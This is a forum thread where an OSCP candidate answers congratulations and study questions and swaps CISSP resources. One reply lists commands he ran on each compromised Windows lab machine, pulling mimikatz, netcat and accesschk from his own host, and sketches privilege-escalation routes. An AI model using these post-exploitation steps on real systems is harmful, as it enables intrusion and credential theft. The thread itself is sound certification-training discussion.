CyberCop's OSCP blog

meni0n

Ok thanks. It's good top know there is some support.

CyberCop123

srocky26 wrote: »

Congrats! I'm probably never going to take the exam, but I do enjoy reading about the journey. You put the work in, you deserved to pass!

Thanks srocky! Glad you enjoyed reading it The exam and certification is not for everyone, especially if your interests lie elsewhere

JoJoCal19 wrote: »

Congrats CyberCop!! I throughly enjoyed following your journey from start to finish. I know you're trying to knock out the CISSP (probably for resume reasons), but what is next for you in the pentesting realm? Plans to go for OSCE?

Hi JoJoCal - good question. CISSP is definitely for my resume/CV I think, I think in any IT Security role it can be very useful.

The OSCE is a definite possibility. I looked into it last week and it appears to be much more around buffer overflows and things like that. There's a course they recommend doing beforehand as preparation.

My rough plan is CISSP.... then maybe OSCE. I'm hoping to move house this year so it will depend a bit on that as well!

ansionnachcliste wrote: »

Congratulations. Do you think this is possible with doing a couple of hours every night for 90 days?


Basically, studying for this while working a full time job and keeping the missus happy :P. Off the top of your head, how many hours have you out into this?

Hey,

It depends a bit on your experience and prior knowledge I think. In the first stages when you read the PDF and watch the videos, it's perfect to study for 2 hours each night as you're reading and learning things from a book.

When you get to the labs I think it's better if you try to do longer sessions. So rather than 2 hours each night, I would aim for 1-2 long sessions per week and the rest of the time just have off.

The reason I say that is, that it sometimes takes a few hours to really get in the zone and find the holes. It's hard to sit down and just start hacking straight off.

I have no idea how many hours I spent working on it, hundreds and hundreds. I read the Georgia Weidman book before and sometimes during my OSCP time and that helped too.

I would say not to go rush or be worried too much about time. It took me 120 days. I had no issue with taking longer. Some weeks I did nothing, literally 0 hours, and some weeks I did 30 hours. 90 days is a good starting point though and you can achieve a lot in that time. I would also consider doing an exam attempt at the end just to try your luck with it. For example if you've hacked 20 machines, you may have a chance of passing and at the very least you'll practice and have some idea what you're dealing with.

LonerVamp wrote: »

Congrats, good job, and good luck on your future!

Thank you very much!

CyberCop123

SaSkiller wrote: »

Congratulations, your thread gave me anxiety. After reading and going through everything I look back to your first posts. Do you feel you have a better feeling of a process now? A methodology per se? I know this is something you struggled with at first. A few other questions.


It was very concerning to hear about being stuck on a machine for 10+ hours trying to get a low priv shell. Any idea why it takes so long?


Any additional resources for enumeration? Your last post described the way I feel very much, that no one really explains it in this context. They either talk about enumeration from the context of a real life test with linkedin and other stuff that won't exist in the lab, or they focus on one tool or the other.


Do you have any advice on improving in your weak point area? Escalating privileges was yours, and I could see in part due to a lack of enumeration, but is there anything else I should know?

Writting my blog gave me anxiety! So it's no surprise you had some from reading it Good questions...


1) I think my methodology is still a bit messy but that's just the way I am and it seems to work to an extent. In every part of my life I am a bit hacky but I generally work effeciently and get a decent outcome. I think you've got to try to have a process, and also be a bit natural with it and go with the flow. The more you do in the labs the more you'll instinctively find a route or way in.


2) Enumeration - I think just researching online and making your own notes is the way to go. For example, if it's a Samba service, then you'll find articles and exploits, from this you can write down syntax and a guide for yourself. Then the next time you get one you'll just copy/paste the syntax and commands and it will 100x quicker thant he first time.


3) Why it takes so long - well it's a few things. Sometimes it's because you're trying too hard. By that I mean many people think there's some very complex and clever, cutting edge hack to gain entry. However, most of the time it's something stupid like a password is in plain text somewhere. It's also because I spent too long sometimes on one machine. E.g. often if you move on and leave it, you'll come back a week later and within an hour have full access just because you're fresh and have a new mindset. It's also about learning. E.g. in the earlier stages I was typing things in without much understanding of why or what it meant. The more I did it, the more I found I was only doing things which were useful and I had a better understanding of what they meant. YOu can't really teach this, it's just experience. If you do the OSCP it will naturally come.




4) No specific resources, just research online. As stated I think enumeration just means "keep digging". Nothing more magical than that. Again experience is helpful as normally certain ports come up but aren't particularly vulnerable. Likewise instincts help to highlight ports which just don't look right. Keep digging as the machine is vulnerable, it is hackable and it's just a case of finding the hole.


5) Privilege Escalation. Well people always use FuzzySecurity | Windows Privilege Escalation Fundamentals for Windows, and in this article is a good video http://www.youtube.com/watch?v=kMG8IsCohHA - I watched this twice and the more you do the more you see what avenues of escalation there are. It's not rocket science - keep telling yourself that. There's only a few possibilities for escalation. Many times it comes down to a service being configured wrongly - e.g. meaning that you can change it... or there's unquoted paths in the registry, meaning you can make it execute your own .exe file, or there's a password loose somewhere. Something like that.


Anytime I gained access to a Windows lab machine I would do the following:


cscript wget.vbs http://myip/accesschk.exe C:\accesschk.exe
cscript wget.vbs http://myip/mimikatz.exe C:\mimikatz.exe
cscript wget.vbs http://myip/nc.exe C:\nc.exe
etc..... etc....


This was just part of the process each time.


Also remember to google the Windows service, the Linux kernel version etc.. and try a few online exploits if they exist.

CyberCop123

t17hha wrote: »

Congrats! I knew you'd pass and welcome aboard!!

Thank you! I am honoured to be part of the club

NEODREAM wrote: »

Amazing job! These threads motivate me so much, especially when it ends with a win!


I really want to dive in, but I think I'll start off with baby steps and begin with the eJPT. I have very limited InfoSec experience (only around 1.5 years) and 0 on the offensive side of things.


Good luck with the CISSP, I'm sure you'll do just as well.

No issue with starting out with eJPT, I looked at that myself. Just take it a step at a time, and you'll pick up lots of knowledge and at some point you'll feel ready to give the OSCP a try. Good luck!

meni0n wrote: »

Congrats on passing. You mentioned forums you were using to see if you were on the right track. What forums were you using ?

hal9k2 wrote: »

I am currently on PWK course and I believe he was talking about OSCP forums where access is only allowed to people that bought course and labs access. This forums has a lot of important stuff related to the course and labs boxes. However big spoilers are being moderated by forum admins, but anyway they can get you on track.

Yep, hal9k2 is correct, the offsec forums was what I meant. Just small subtle hints. E.g. you see tons of threads talking about the web service, and that would then confirm to you that you're on the right path. Just to be clear, I would only go there after quite a number of hours of being stuck.

CyberCop123

saerian wrote: »

Congrats on passing your exam!!! I'm taking a similar approach in that I'm taking my time going through the videos/pdf before tackling the labs. It's rough, because I really want to jump in ... but I have no prior experience with pen testing so I need to learn the basics. I'm hoping to finish going through the material by next week, and then fully jump into the labs. It's extremely encouraging to see that someone with a similar approach was able to get through it all and pass.


The CISSP is more a business/managerial/procedural based exam. Depending on your experience (just like with any other exam), you can push through the material quickly, or it could take you longer.


So, funny story. Last year I accepted a job position overseas, on the condition that I pass the CISSP within six months of hire. Getting the CISSP was already something I wanted to get anyway, so I agreed. Went through the hiring process, accepted the offer. On the morning I was going to give notice, I got a call from the new job. The position requirements changed, the CISSP was needed on hire. They wanted me to take the exam that week... I was able to get them to give me three weeks.


At this point, I hadn't started preparing at all. First week I didn't do much studying, but really pushed the material hard the last two weeks. My test was scheduled at a testing center about an hour away from where I lived, so I stayed at a hotel the night before and stayed up late pushing through practice questions. The next morning I took the test. I finished in about 2 hours, and passed.


I'm pretty sure I only was able to pass that quickly because of my background. I had about 3 years experience as a network administrator, and then almost 2 years in INFOSEC doing certification and accreditation in a couple of different roles. This helped tremendously, a lot of stuff on the test were things I had learned about/experienced while working.


The CISSP exam has changed recently, not the content but the actual exam format itself: https://www.isc2.org/Certifications/CISSP/CISSP-CAT


Here are the resources I used to study..


Eric Conrad Books:
https://www.amazon.com/gp/product/0128024372/
https://www.amazon.com/gp/product/


Cybrary Course:
https://www.cybrary.it/course/cissp/


CCCure Questions:
https://www.freepracticetests.org/quiz/index.php


I hope this helps!

Good luck with the OSCP, I think your approach is sensible and it makes sense - learn the theory and then put it into practice. Worked well for me and others. The only ones not doing this are experienced pen testers who know it already.


Very very helpful post regarding the CISSP. I was aware of the new format change. I am about to start a blog on my CISSP journey - so keep an eye out for it I have so far read up to and including Chapter 3 of the Sybex book. This is still Domain 1. I'm finding that it all links together a little, but the amount of acronyms are so frustrating. There's hundreds and for silly things as well.


I'm always unsure about the experience that some say helps. I've been a web developer, done some linux admin before, python, my OSCP and worked for the Police but not sure I have "infosec experience" in the general sense. Some parts of the CISSP look more comfortable to me, stuff on networking an cryptography.


I think Domain 1 may be the biggest area for me to learn about as it is completely and totally management orientated. I have a loose plan to be ready for the exam in 11 weeks time. Hopefully that is realistic.


Can't believe your CISSP story, that is incredible! Also amazing that you passed too, that must have been so stressful. Well done and hopefully your job is going well.


Thanks for your help and advice.